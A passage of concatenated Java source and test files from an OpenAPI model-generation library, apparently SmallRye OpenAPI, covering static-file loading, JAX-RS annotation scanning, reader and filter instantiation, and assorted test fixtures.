if (staticFiles != null && staticFiles.length > 0) {
for (OpenApiStaticFile staticFile : staticFiles) {
OpenApiDocument.INSTANCE.modelFromStaticFile(modelFromStaticFile(staticFile));
}
}
// Scan annotations
if (config != null && index != null) {
OpenApiDocument.INSTANCE.modelFromAnnotations(modelFromAnnotations(config, classLoader, index));
}
// Load the model from the configured OASModelReader and register the configured OASFilter
if (config != null && classLoader != null) {
OpenApiDocument.INSTANCE.modelFromReader(modelFromReader(config, classLoader));
OpenApiDocument.INSTANCE.filter(getFilter(config, classLoader));
}
OpenApiDocument.INSTANCE.initialize();
OpenAPI openAPI = OpenApiDocument.INSTANCE.get();
OpenApiDocument.INSTANCE.reset();
return openAPI;
}
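// Illustrative usage sketch (not part of the original source): a hosting runtime that has
// already built a Jandex IndexView of the deployment might bootstrap the model roughly like
// this, using only the overloads defined above. The variable names are placeholders.
//
//   Config mpConfig = ConfigProvider.getConfig();
//   OpenApiConfig openApiConfig = OpenApiConfigImpl.fromConfig(mpConfig);
//   IndexView index = ...; // supplied by the host
//   OpenAPI model = OpenApiProcessor.bootstrap(openApiConfig, index);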
/**
* Parse the static file content and return the resulting model. Note that this
* method does NOT close the resources in the static file. The caller is
* responsible for that.
*
* @param staticFile OpenApiStaticFile to be parsed
* @return OpenApiImpl
*/
public static OpenAPI modelFromStaticFile(OpenApiStaticFile staticFile) {
if (staticFile == null) {
return null;
}
try {
return OpenApiParser.parse(staticFile.getContent(), staticFile.getFormat());
} catch (IOException e) {
throw new OpenApiRuntimeException(e);
}
}
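// Illustrative usage sketch (not part of the original source): since this method does not
// close the stream, a caller that owns it might wrap the call in try-with-resources. The
// resource path below is one of the conventional locations probed by loadOpenApiStaticFiles.
//
//   try (InputStream in = classLoader.getResourceAsStream("/META-INF/openapi.yaml")) {
//       OpenAPI model = OpenApiProcessor.modelFromStaticFile(new OpenApiStaticFile(in, Format.YAML));
//   }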
/**
* Create an {@link OpenAPI} model by scanning the deployment for relevant JAX-RS and
* OpenAPI annotations. If scanning is disabled, this method returns null. If scanning
* is enabled but no relevant annotations are found, an empty OpenAPI model is returned.
*
* @param config OpenApiConfig
* @param index IndexView of Archive
* @return OpenAPIImpl generated from annotations
*/
public static OpenAPI modelFromAnnotations(OpenApiConfig config, IndexView index) {
return modelFromAnnotations(config, ClassLoaderUtil.getDefaultClassLoader(), index);
}
/**
* Create an {@link OpenAPI} model by scanning the deployment for relevant JAX-RS and
* OpenAPI annotations. If scanning is disabled, this method returns null. If scanning
* is enabled but no relevant annotations are found, an empty OpenAPI model is returned.
*
* @param config OpenApiConfig
* @param loader ClassLoader
* @param index IndexView of Archive
* @return OpenAPIImpl generated from annotations
*/
public static OpenAPI modelFromAnnotations(OpenApiConfig config, ClassLoader loader, IndexView index) {
if (config.scanDisable()) {
return null;
}
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(config, loader, index);
return scanner.scan();
}
/**
* Instantiate the configured {@link OASModelReader} and invoke it. If no reader is configured,
* then return null. If a class is configured but there is an error either instantiating or invoking
* it, an {@link OpenApiRuntimeException} is thrown.
*
* @param config OpenApiConfig
* @param loader ClassLoader
* @return OpenApiImpl created from OASModelReader
*/
public static OpenAPI modelFromReader(OpenApiConfig config, ClassLoader loader) {
String readerClassName = config.modelReader();
if (readerClassName == null) {
return null;
}
try {
Class<?> c = loader.loadClass(readerClassName);
OASModelReader reader = (OASModelReader) c.getDeclaredConstructor().newInstance();
return reader.buildModel();
} catch (ClassNotFoundException | InstantiationException | IllegalAccessException | IllegalArgumentException
| InvocationTargetException | NoSuchMethodException | SecurityException e) {
throw new OpenApiRuntimeException(e);
}
}
/**
* Instantiate the {@link OASFilter} configured by the app.
*
* @param config OpenApiConfig
* @param loader ClassLoader
* @return OASFilter instance retrieved from loader
*/
public static OASFilter getFilter(OpenApiConfig config, ClassLoader loader) {
String filterClassName = config.filter();
if (filterClassName == null) {
return null;
}
try {
Class<?> c = loader.loadClass(filterClassName);
return (OASFilter) c.getDeclaredConstructor().newInstance();
} catch (ClassNotFoundException | InstantiationException | IllegalAccessException | IllegalArgumentException
| InvocationTargetException | NoSuchMethodException | SecurityException e) {
throw new OpenApiRuntimeException(e);
}
}
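// Illustrative sketch (not part of the original source): the class name returned by
// config.filter() is expected to identify an application-provided OASFilter implementation
// with a no-argument constructor, for example:
//
//   public class MyFilter implements OASFilter {
//       @Override
//       public void filterOpenAPI(OpenAPI openAPI) {
//           // adjust the assembled model before it is returned
//       }
//   }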
private static List<OpenApiStaticFile> loadOpenApiStaticFiles(ClassLoader classLoader) {
List<OpenApiStaticFile> apiStaticFiles = new ArrayList<>();
loadOpenApiStaticFile(apiStaticFiles, classLoader, "/META-INF/openapi.yaml", Format.YAML);
loadOpenApiStaticFile(apiStaticFiles, classLoader, "/WEB-INF/classes/META-INF/openapi.yaml", Format.YAML);
loadOpenApiStaticFile(apiStaticFiles, classLoader, "/META-INF/openapi.yml", Format.YAML);
loadOpenApiStaticFile(apiStaticFiles, classLoader, "/WEB-INF/classes/META-INF/openapi.yml", Format.YAML);
loadOpenApiStaticFile(apiStaticFiles, classLoader, "/META-INF/openapi.json", Format.JSON);
loadOpenApiStaticFile(apiStaticFiles, classLoader, "/WEB-INF/classes/META-INF/openapi.json", Format.JSON);
return apiStaticFiles;
}
private static List<OpenApiStaticFile> loadOpenApiStaticFile(List<OpenApiStaticFile> apiStaticFiles,
ClassLoader classLoader, String path, Format format) {
InputStream staticStream = classLoader.getResourceAsStream(path);
if (staticStream != null) {
apiStaticFiles.add(new OpenApiStaticFile(staticStream, format));
}
return apiStaticFiles;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/Sub2TestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import jakarta.ws.rs.GET;
import jakarta.ws.rs.Path;
import jakarta.ws.rs.PathParam;
@SuppressWarnings(value = "unused")
public class Sub2TestResource<T> {
@GET
@Path(value = "{subsubid}")
public T getSub2(@PathParam(value = "subsubid") String subsubid) {
return null;
}
}
<|start_filename|>extension-jaxrs/src/test/java/io/smallrye/openapi/runtime/scanner/JaxbJaxRsAnnotationScannerBasicTest.java<|end_filename|>
package io.smallrye.openapi.runtime.scanner;
import java.io.IOException;
import org.eclipse.microprofile.openapi.models.OpenAPI;
import org.jboss.jandex.Index;
import org.jboss.jandex.Indexer;
import org.json.JSONException;
import org.junit.jupiter.api.Test;
/**
* Basic tests mostly to compare with Spring
*
* @author <NAME> (<EMAIL>)
*/
class JaxbJaxRsAnnotationScannerBasicTest extends JaxRsDataObjectScannerTestBase {
/**
* This tests a basic hello-world GET service with no OpenAPI annotations.
*
* @throws IOException
* @throws JSONException
*/
@Test
void testJavaxBasicJaxRsGetDefinitionScanning() throws IOException, JSONException {
Indexer indexer = new Indexer();
index(indexer, "test/io/smallrye/openapi/runtime/scanner/resources/JaxbGreetingGetResource.class");
index(indexer, "test/io/smallrye/openapi/runtime/scanner/entities/Greeting.class");
index(indexer, "test/io/smallrye/openapi/runtime/scanner/entities/JaxbGreeting.class");
index(indexer, "test/io/smallrye/openapi/runtime/scanner/entities/JaxbWithNameGreeting.class");
testBasicJaxRsGetDefinitionScanning(indexer.complete());
}
@Test
void testJakartaBasicJaxRsGetDefinitionScanning() throws IOException, JSONException {
Indexer indexer = new Indexer();
index(indexer, "test/io/smallrye/openapi/runtime/scanner/resources/jakarta/JaxbGreetingGetResource.class");
index(indexer, "test/io/smallrye/openapi/runtime/scanner/entities/Greeting.class");
index(indexer, "test/io/smallrye/openapi/runtime/scanner/entities/jakarta/JaxbGreeting.class");
index(indexer, "test/io/smallrye/openapi/runtime/scanner/entities/jakarta/JaxbWithNameGreeting.class");
testBasicJaxRsGetDefinitionScanning(indexer.complete());
}
void testBasicJaxRsGetDefinitionScanning(Index i) throws IOException, JSONException {
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.testBasicJaxbJaxRsGetDefinitionScanning.json", result);
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/resources/JaxbGreetingGetResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.resources;
import javax.ws.rs.Consumes;
import javax.ws.rs.GET;
import javax.ws.rs.Path;
import javax.ws.rs.PathParam;
import javax.ws.rs.Produces;
import javax.ws.rs.core.MediaType;
import test.io.smallrye.openapi.runtime.scanner.entities.Greeting;
import test.io.smallrye.openapi.runtime.scanner.entities.JaxbGreeting;
import test.io.smallrye.openapi.runtime.scanner.entities.JaxbWithNameGreeting;
/**
* JAX-RS.
* Some basic tests, mostly to compare with the Spring implementation
*
* @author <NAME> (<EMAIL>)
*/
@Path("/greeting")
@Produces(MediaType.APPLICATION_XML)
@Consumes(MediaType.APPLICATION_XML)
public class JaxbGreetingGetResource {
@GET
@Path("/helloPathVariable1/{name}")
public Greeting helloPathVariable1(@PathParam("name") String name) {
return new Greeting("Hello " + name);
}
@GET
@Path("/helloPathVariable2/{name}")
public JaxbGreeting helloPathVariable2(@PathParam("name") String name) {
return new JaxbGreeting("Hello " + name);
}
@GET
@Path("/helloPathVariable3/{name}")
public JaxbWithNameGreeting helloPathVariable3(@PathParam("name") String name) {
return new JaxbWithNameGreeting("Hello " + name, "Title!", null);
}
}
<|start_filename|>core/src/test/java/io/smallrye/openapi/runtime/scanner/ComponentOrderTest.java<|end_filename|>
package io.smallrye.openapi.runtime.scanner;
import static org.junit.jupiter.api.Assertions.assertArrayEquals;
import org.eclipse.microprofile.openapi.models.OpenAPI;
import org.eclipse.microprofile.openapi.models.tags.Tag;
import org.jboss.jandex.Index;
import org.junit.jupiter.api.Test;
class ComponentOrderTest extends IndexScannerTestBase {
/*
* https://github.com/smallrye/smallrye-open-api/issues/735
*/
@Test
void testComponentsKeysSorted() throws Exception {
Index index = indexOf(Class.forName(getClass().getPackage().getName() + ".sorttest1.package-info"),
Class.forName(getClass().getPackage().getName() + ".sorttest2.package-info"));
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), index);
String[] expectedNames = { "123", "ABC", "DEF", "GHI", "KLM", "XYZ" };
OpenAPI result = scanner.scan();
printToConsole(result);
assertArrayEquals(expectedNames, result.getComponents().getCallbacks().keySet().toArray());
assertArrayEquals(expectedNames, result.getComponents().getExamples().keySet().toArray());
assertArrayEquals(expectedNames, result.getComponents().getHeaders().keySet().toArray());
assertArrayEquals(expectedNames, result.getComponents().getLinks().keySet().toArray());
assertArrayEquals(expectedNames, result.getComponents().getParameters().keySet().toArray());
assertArrayEquals(expectedNames, result.getComponents().getRequestBodies().keySet().toArray());
assertArrayEquals(expectedNames, result.getComponents().getResponses().keySet().toArray());
assertArrayEquals(expectedNames, result.getComponents().getSchemas().keySet().toArray());
assertArrayEquals(expectedNames, result.getComponents().getSecuritySchemes().keySet().toArray());
}
@Test
void testDefinitionTagOrderPreserved() throws Exception {
Index index = indexOf(Class.forName(getClass().getPackage().getName() + ".sorttest1.package-info"),
Class.forName(getClass().getPackage().getName() + ".sorttest2.package-info"));
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(emptyConfig(), index);
String[] expectedNames = { "DEF", "XYZ", "ABC" };
OpenAPI result = scanner.scan();
printToConsole(result);
assertArrayEquals(expectedNames, result.getTags().stream().map(Tag::getName).toArray());
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/ResteasyReactiveExceptionMapper.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import jakarta.ws.rs.core.Response;
import jakarta.ws.rs.ext.ExceptionMapper;
// Mimic org.jboss.resteasy.reactive.server.spi.ResteasyReactiveExceptionMapper
public interface ResteasyReactiveExceptionMapper<E extends Throwable> extends ExceptionMapper<E> {
Response toResponse(E exception, Object context);
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/Message.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
public class Message {
private String message;
private String description;
public Message() {
}
public Message(String message) {
this.message = message;
}
public Message(String message, String description) {
this.message = message;
this.description = description;
}
public String getMessage() {
return message;
}
public String getDescription() {
return description;
}
}
<|start_filename|>core/src/main/java/io/smallrye/openapi/api/util/UtilLogging.java<|end_filename|>
package io.smallrye.openapi.api.util;
import org.jboss.logging.BasicLogger;
import org.jboss.logging.Logger;
import org.jboss.logging.annotations.Cause;
import org.jboss.logging.annotations.LogMessage;
import org.jboss.logging.annotations.Message;
import org.jboss.logging.annotations.MessageLogger;
@MessageLogger(projectCode = "SROAP", length = 5)
interface UtilLogging extends BasicLogger {
UtilLogging logger = Logger.getMessageLogger(UtilLogging.class, UtilLogging.class.getPackage().getName());
@LogMessage(level = Logger.Level.ERROR)
@Message(id = 1000, value = "Failed to introspect BeanInfo for: %s")
void failedToIntrospectBeanInfo(Class<?> clazz, @Cause Throwable cause);
}
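// Illustrative usage sketch (not part of the original source): JBoss Logging generates the
// implementation, so callers in this package simply invoke the typed method, e.g.
//
//   UtilLogging.logger.failedToIntrospectBeanInfo(SomeBean.class, exception);
//
// where SomeBean and exception stand in for the caller's own class and Throwable.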
<|start_filename|>extension-jaxrs/src/test/java/io/smallrye/openapi/runtime/scanner/SpecialCaseTests.java<|end_filename|>
package io.smallrye.openapi.runtime.scanner;
import java.io.IOException;
import org.eclipse.microprofile.openapi.models.media.Schema;
import org.jboss.jandex.Type;
import org.json.JSONException;
import org.junit.jupiter.params.ParameterizedTest;
import org.junit.jupiter.params.provider.CsvSource;
import test.io.smallrye.openapi.runtime.scanner.entities.SpecialCaseTestContainer;
/**
* @author <NAME> {@literal <<EMAIL>>}
*/
class SpecialCaseTests extends JaxRsDataObjectScannerTestBase {
@ParameterizedTest
@CsvSource({
"SimpleTerminalType, listOfString, special.simple.expected.json",
"DataObjectList, ccList, special.dataObjectList.expected.json",
"WildcardWithSuperBound, listSuperFlight, special.wildcardWithSuperBound.expected.json",
"WildcardWithExtendBound, listExtendsFoo, special.wildcardWithExtendBound.expected.json",
"Wildcard, listOfAnything, special.wildcard.expected.json"
})
void testCollection(String label, String field, String expectedResource) throws IOException, JSONException {
String name = SpecialCaseTestContainer.class.getName();
Type pType = getFieldFromKlazz(name, field).type();
OpenApiDataObjectScanner scanner = new OpenApiDataObjectScanner(context, pType);
Schema result = scanner.process();
printToConsole(name, result);
assertJsonEquals(name, expectedResource, result);
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/User.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject;
import javax.validation.constraints.Max;
import javax.validation.constraints.Positive;
public interface User {
@Positive
@Max(value = 9999)
Integer getId();
}
<|start_filename|>core/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/jakarta/JaxbCustomPropertyOrder.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject.jakarta;
import jakarta.xml.bind.annotation.XmlAttribute;
import jakarta.xml.bind.annotation.XmlElement;
import jakarta.xml.bind.annotation.XmlType;
@XmlType(propOrder = { "theName", "comment2ActuallyFirst", "comment", "name2" })
public class JaxbCustomPropertyOrder {
@XmlElement(name = "theName")
String name;
@XmlAttribute
String name2;
@XmlElement
String comment;
@XmlAttribute(name = "comment2ActuallyFirst")
String comment2;
public String getComment() {
return comment;
}
public String getName() {
return name;
}
public String getName2() {
return name2;
}
public String getComment2() {
return comment2;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/Widget.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
public class Widget {
String id;
String name;
}
<|start_filename|>core/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/OneSidedProperties.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
public class OneSidedProperties extends OneSidedParent {
String prop1;
String prop2;
String prop3;
@Schema(hidden = true)
public String getProp1() {
return prop1;
}
public void setProp1(String prop1) {
this.prop1 = prop1;
}
public String getProp2() {
return prop2;
}
@Schema(hidden = true)
public void setProp2(String prop2) {
this.prop2 = prop2;
}
}
<|start_filename|>testsuite/extra/src/test/java/test/io/smallrye/openapi/tck/ExtraSuiteLogging.java<|end_filename|>
package test.io.smallrye.openapi.tck;
import org.jboss.logging.Logger;
import org.jboss.logging.annotations.LogMessage;
import org.jboss.logging.annotations.Message;
import org.jboss.logging.annotations.MessageLogger;
@MessageLogger(projectCode = "SROAP", length = 5)
interface ExtraSuiteLogging {
ExtraSuiteLogging log = Logger.getMessageLogger(ExtraSuiteLogging.class, ExtraSuiteLogging.class.getPackage().getName());
@LogMessage(level = Logger.Level.DEBUG)
@Message(id = 12000, value = "Indexing asset: %s from archive: %s")
void indexing(String archivePath, String archive);
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/jakarta/Canine.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.jakarta;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
public interface Canine {
@Schema(name = "bark1", readOnly = true)
public String getBark();
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/ExampleResource1.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import java.time.LocalDate;
import javax.ws.rs.Path;
@Path(value = "/hi")
public class ExampleResource1 extends GenericResource implements Greetable {
String from;
@Override
public void setFromName(String from) {
this.from = from;
}
LocalDate date;
@Override
public void setGreetingDate(LocalDate date) {
this.date = date;
}
@Override
public String greet(GreetingBean bean) {
return "hi " + bean.name + ", from: " + from + "; on date: " + date;
}
}
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/ResponseGenerationSuppressedBySuppliedDefaultApiResourceTestResource.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.Consumes;
import javax.ws.rs.POST;
import javax.ws.rs.Path;
import javax.ws.rs.Produces;
import javax.ws.rs.core.MediaType;
import org.eclipse.microprofile.openapi.annotations.responses.APIResponse;
@Path(value = "pets")
public class ResponseGenerationSuppressedBySuppliedDefaultApiResourceTestResource {
@POST
@Consumes(value = MediaType.APPLICATION_JSON)
@Produces(value = MediaType.APPLICATION_JSON)
@APIResponse(responseCode = "200", content = {}, description = "Description 200")
@APIResponse(responseCode = "204", description = "Description 204")
@APIResponse(responseCode = "400", description = "Description 400")
public Pet createOrUpdatePet(Pet pet) {
return pet;
}
}
<|start_filename|>core/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/Feline.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject;
import org.eclipse.microprofile.openapi.annotations.media.Schema;
public interface Feline {
@Schema(name = "name", required = false, example = "Feline")
void setName(String name);
}
<|start_filename|>core/src/test/java/io/smallrye/openapi/api/OpenApiConfigImplTest.java<|end_filename|>
package io.smallrye.openapi.api;
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertNull;
import org.eclipse.microprofile.config.Config;
import org.eclipse.microprofile.config.ConfigProvider;
import org.eclipse.microprofile.openapi.OASConfig;
import org.junit.jupiter.api.Test;
class OpenApiConfigImplTest {
private static final String TEST_PROPERTY = OASConfig.EXTENSIONS_PREFIX + "OpenApiConfigImplTest";
@Test
void testGetStringConfigValueMissingIsNull() {
System.clearProperty(TEST_PROPERTY);
Config config = ConfigProvider.getConfig();
OpenApiConfigImpl oaiConfig = new OpenApiConfigImpl(config);
assertNull(oaiConfig.getStringConfigValue(TEST_PROPERTY));
}
@Test
void testGetStringConfigValueBlankIsNull() {
System.setProperty(TEST_PROPERTY, "\t \n\r");
try {
Config config = ConfigProvider.getConfig();
OpenApiConfigImpl oaiConfig = new OpenApiConfigImpl(config);
// A whitespace-only value is treated as an absent value
assertNull(oaiConfig.getStringConfigValue(TEST_PROPERTY));
} finally {
System.clearProperty(TEST_PROPERTY);
}
}
@Test
void testGetStringConfigValuePresent() {
System.setProperty(TEST_PROPERTY, " VALUE \t");
try {
Config config = ConfigProvider.getConfig();
OpenApiConfigImpl oaiConfig = new OpenApiConfigImpl(config);
// Trimming is only used to determine whether the value is blank; the full value is returned for application use
assertEquals(" VALUE \t", oaiConfig.getStringConfigValue(TEST_PROPERTY));
} finally {
System.clearProperty(TEST_PROPERTY);
}
}
}
<|start_filename|>core/src/main/java/io/smallrye/openapi/api/constants/SecurityConstants.java<|end_filename|>
package io.smallrye.openapi.api.constants;
import java.util.Arrays;
import java.util.List;
import org.jboss.jandex.DotName;
/**
* Constants related to the Security annotations
*
* @author <NAME> (<EMAIL>)
* @author <NAME> (<EMAIL>)
*/
public class SecurityConstants {
public static final List<DotName> DECLARE_ROLES = Arrays.asList(
DotName.createSimple("javax.annotation.security.DeclareRoles"),
DotName.createSimple("jakarta.annotation.security.DeclareRoles"));
public static final List<DotName> ROLES_ALLOWED = Arrays.asList(
DotName.createSimple("javax.annotation.security.RolesAllowed"),
DotName.createSimple("jakarta.annotation.security.RolesAllowed"));
public static final List<DotName> PERMIT_ALL = Arrays.asList(
DotName.createSimple("javax.annotation.security.PermitAll"),
DotName.createSimple("jakarta.annotation.security.PermitAll"));
public static final List<DotName> DENY_ALL = Arrays.asList(
DotName.createSimple("javax.annotation.security.DenyAll"),
DotName.createSimple("jakarta.annotation.security.DenyAll"));
private SecurityConstants() {
}
}
<|start_filename|>core/src/main/java/io/smallrye/openapi/runtime/io/CurrentScannerInfo.java<|end_filename|>
package io.smallrye.openapi.runtime.io;
import org.jboss.jandex.Type;
import io.smallrye.openapi.runtime.scanner.spi.AnnotationScanner;
/**
* A simple registry to hold the current scanner info
*
* @author <NAME> (<EMAIL>)
*/
public class CurrentScannerInfo {
private static final ThreadLocal<CurrentScannerInfo> current = new ThreadLocal<>();
public static void register(AnnotationScanner annotationScanner) {
CurrentScannerInfo registry = new CurrentScannerInfo(annotationScanner);
current.set(registry);
}
public static AnnotationScanner getCurrentAnnotationScanner() {
CurrentScannerInfo info = current.get();
return info != null ? info.annotationScanner : null;
}
public static void setCurrentConsumes(final String[] currentConsumes) {
current.get().currentConsumes = currentConsumes;
}
public static String[] getCurrentConsumes() {
return current.get().currentConsumes;
}
public static void setCurrentProduces(final String[] currentProduces) {
current.get().currentProduces = currentProduces;
}
public static String[] getCurrentProduces() {
return current.get().currentProduces;
}
public static void remove() {
current.remove();
}
public static boolean isWrapperType(Type type) {
AnnotationScanner scanner = getCurrentAnnotationScanner();
return scanner != null && scanner.isWrapperType(type);
}
public static boolean isScannerInternalResponse(Type type) {
AnnotationScanner scanner = getCurrentAnnotationScanner();
return scanner != null && scanner.isScannerInternalResponse(type);
}
private String[] currentConsumes;
private String[] currentProduces;
private final AnnotationScanner annotationScanner;
private CurrentScannerInfo(final AnnotationScanner annotationScanner) {
this.annotationScanner = annotationScanner;
this.currentConsumes = null;
this.currentProduces = null;
}
}
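// Illustrative usage sketch (not part of the original source): callers are expected to pair
// register(...) with remove() so the ThreadLocal does not leak across scans, e.g.
//
//   CurrentScannerInfo.register(scanner);
//   try {
//       // ... run the scan; helpers may consult getCurrentAnnotationScanner() ...
//   } finally {
//       CurrentScannerInfo.remove();
//   }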
<|start_filename|>core/src/test/java/test/io/smallrye/openapi/runtime/scanner/dataobject/XmlAccessTypePublicMember.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner.dataobject;
import javax.xml.bind.annotation.XmlAccessType;
import javax.xml.bind.annotation.XmlAccessorType;
@XmlAccessorType(value = XmlAccessType.PUBLIC_MEMBER)
public class XmlAccessTypePublicMember {
public String prop1Field;
@SuppressWarnings(value = "unused")
private String prop2Field;
public String getProp3Property() {
return null;
}
}
<|start_filename|>ui/open-api-ui/src/main/java/io/smallrye/openapi/ui/ThemeHref.java<|end_filename|>
package io.smallrye.openapi.ui;
/**
* Available themes
*
* @author <NAME> (<EMAIL>)
*/
public enum ThemeHref {
original,
feeling_blue,
flattop,
material,
monokai,
muted,
newspaper,
outline;
@Override
public String toString() {
switch (this) {
case feeling_blue:
return String.format(FORMAT, "feeling-blue");
case flattop:
return String.format(FORMAT, "flattop");
case material:
return String.format(FORMAT, "material");
case monokai:
return String.format(FORMAT, "monokai");
case muted:
return String.format(FORMAT, "muted");
case newspaper:
return String.format(FORMAT, "newspaper");
case outline:
return String.format(FORMAT, "outline");
default:
return null;
}
}
private static final String FORMAT = "theme-%s.css";
}
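// Illustrative examples (not part of the original source), following the FORMAT constant above:
//   ThemeHref.material.toString()  -> "theme-material.css"
//   ThemeHref.original.toString()  -> null (falls through to the default branch)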
<|start_filename|>extension-jaxrs/src/test/java/test/io/smallrye/openapi/runtime/scanner/BeanParamBase.java<|end_filename|>
package test.io.smallrye.openapi.runtime.scanner;
import javax.ws.rs.QueryParam;
public class BeanParamBase implements BeanParamAddon {
@QueryParam(value = "qc1")
String qc1;
@Override
public void setHeaderParam1(String value) {
}
}
<|start_filename|>extension-jaxrs/src/test/java/io/smallrye/openapi/runtime/scanner/GenericModelTypesResourceTest.java<|end_filename|>
package io.smallrye.openapi.runtime.scanner;
import java.io.IOException;
import java.util.HashMap;
import java.util.List;
import org.eclipse.microprofile.openapi.models.OpenAPI;
import org.jboss.jandex.Index;
import org.json.JSONException;
import org.junit.jupiter.api.Test;
import io.smallrye.openapi.api.constants.OpenApiConstants;
class GenericModelTypesResourceTest extends IndexScannerTestBase {
/*
* Test case derived from original example in SmallRye OpenAPI issue #25.
*
* https://github.com/smallrye/smallrye-open-api/issues/25
*
*/
@Test
void testJavaxGenericsApplication() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.BaseModel.class,
test.io.smallrye.openapi.runtime.scanner.BaseResource.class,
test.io.smallrye.openapi.runtime.scanner.KingCrimson.class,
test.io.smallrye.openapi.runtime.scanner.KingCrimsonResource.class,
test.io.smallrye.openapi.runtime.scanner.Magma.class,
test.io.smallrye.openapi.runtime.scanner.MagmaResource.class,
test.io.smallrye.openapi.runtime.scanner.Message.class,
test.io.smallrye.openapi.runtime.scanner.OpenAPIConfig.class,
test.io.smallrye.openapi.runtime.scanner.Residents.class,
test.io.smallrye.openapi.runtime.scanner.ResidentsResource.class,
test.io.smallrye.openapi.runtime.scanner.Result.class,
test.io.smallrye.openapi.runtime.scanner.ResultList.class,
test.io.smallrye.openapi.runtime.scanner.POJO.class,
List.class);
testGenericsApplication(i);
}
@Test
void testJakartaGenericsApplication() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.jakarta.BaseModel.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.BaseResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.KingCrimson.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.KingCrimsonResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Magma.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.MagmaResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Message.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.OpenAPIConfig.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Residents.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.ResidentsResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Result.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.ResultList.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.POJO.class,
List.class);
testGenericsApplication(i);
}
void testGenericsApplication(Index i) throws IOException, JSONException {
OpenApiAnnotationScanner scanner = new OpenApiAnnotationScanner(dynamicConfig(new HashMap<String, Object>()), i);
OpenAPI result = scanner.scan();
printToConsole(result);
assertJsonEquals("resource.generic-model-types.json", result);
}
@Test
void testJavaxGenericsApplicationWithoutArrayRefs() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.BaseModel.class,
test.io.smallrye.openapi.runtime.scanner.BaseResource.class,
test.io.smallrye.openapi.runtime.scanner.KingCrimson.class,
test.io.smallrye.openapi.runtime.scanner.KingCrimsonResource.class,
test.io.smallrye.openapi.runtime.scanner.Magma.class,
test.io.smallrye.openapi.runtime.scanner.MagmaResource.class,
test.io.smallrye.openapi.runtime.scanner.Message.class,
test.io.smallrye.openapi.runtime.scanner.OpenAPIConfig.class,
test.io.smallrye.openapi.runtime.scanner.Residents.class,
test.io.smallrye.openapi.runtime.scanner.ResidentsResource.class,
test.io.smallrye.openapi.runtime.scanner.Result.class,
test.io.smallrye.openapi.runtime.scanner.ResultList.class,
test.io.smallrye.openapi.runtime.scanner.POJO.class,
List.class);
testGenericsApplicationWithoutArrayRefs(i);
}
@Test
void testJakartaGenericsApplicationWithoutArrayRefs() throws IOException, JSONException {
Index i = indexOf(test.io.smallrye.openapi.runtime.scanner.jakarta.BaseModel.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.BaseResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.KingCrimson.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.KingCrimsonResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Magma.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.MagmaResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Message.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.OpenAPIConfig.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Residents.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.ResidentsResource.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.Result.class,
test.io.smallrye.openapi.runtime.scanner.jakarta.ResultList.class,
